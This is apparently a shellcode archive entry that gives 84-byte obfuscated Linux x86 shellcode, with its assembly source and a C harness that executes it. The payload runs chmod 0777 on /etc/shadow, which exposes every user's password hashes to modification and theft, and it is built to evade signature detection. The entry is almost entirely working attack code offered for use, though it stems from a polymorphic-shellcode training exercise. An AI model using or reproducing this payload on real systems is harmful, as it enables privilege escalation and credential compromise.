Shellcode - Linux/x86 - chmod 0777 /etc/shadow obfuscated (84 bytes)

[Kalashnikov.]

/*  

* Linux x86 - execve chmod 0777 /etc/shadow

* Obfuscated version - 84 bytes

* Original: http://shell-storm.org/shellcode/files/shellcode-828.php

* Author: xmgv

* Details: https://xmgv.wordpress.com/2015/03/13/slae-6-polymorphic-shellcode/

*/

/*

global _start

section .text

_start:

sub edx, edx

push edx

mov eax, 0xb33fb33f

sub eax, 0x3bd04ede

push eax

jmp short two

end:

int 0x80

four:

push edx

push esi

push ebp

push ebx

mov ecx, esp

push byte 0xc

pop eax

dec eax

jmp short end

three:

push edx

sub eax, 0x2c3d2dff

push eax

mov ebp, esp

push edx

add eax, 0x2d383638

push eax

sub eax, 0x013ffeff

push eax

sub eax, 0x3217d6d2

add eax, 0x31179798

push eax

mov ebx, esp

jmp short four

two:

sub eax, 0x0efc3532

push eax

sub eax, 0x04feca01

inc eax

push eax

mov esi, esp

jmp short three

*/

#include <stdio.h>

#include <string.h>

unsigned char code[] =

"\x29\xd2\x52\xb8\x3f\xb3\x3f\xb3\x2d\xde\x4e\xd0\x3b\x50\xeb\x33\xcd\x80"

"\x52\x56\x55\x53\x89\xe1\x6a\x0c\x58\x48\xeb\xf2\x52\x2d\xff\x2d\x3d\x2c"

"\x50\x89\xe5\x52\x05\x38\x36\x38\x2d\x50\x2d\xff\xfe\x3f\x01\x50\x2d\xd2"

"\xd6\x17\x32\x05\x98\x97\x17\x31\x50\x89\xe3\xeb\xcf\x2d\x32\x35\xfc\x0e"

"\x50\x2d\x01\xca\xfe\x04\x40\x50\x89\xe6\xeb\xca";

int main() {

printf("Shellcode Length: %d\n", strlen(code));

int (*ret)() = (int(*)())code;

ret();

}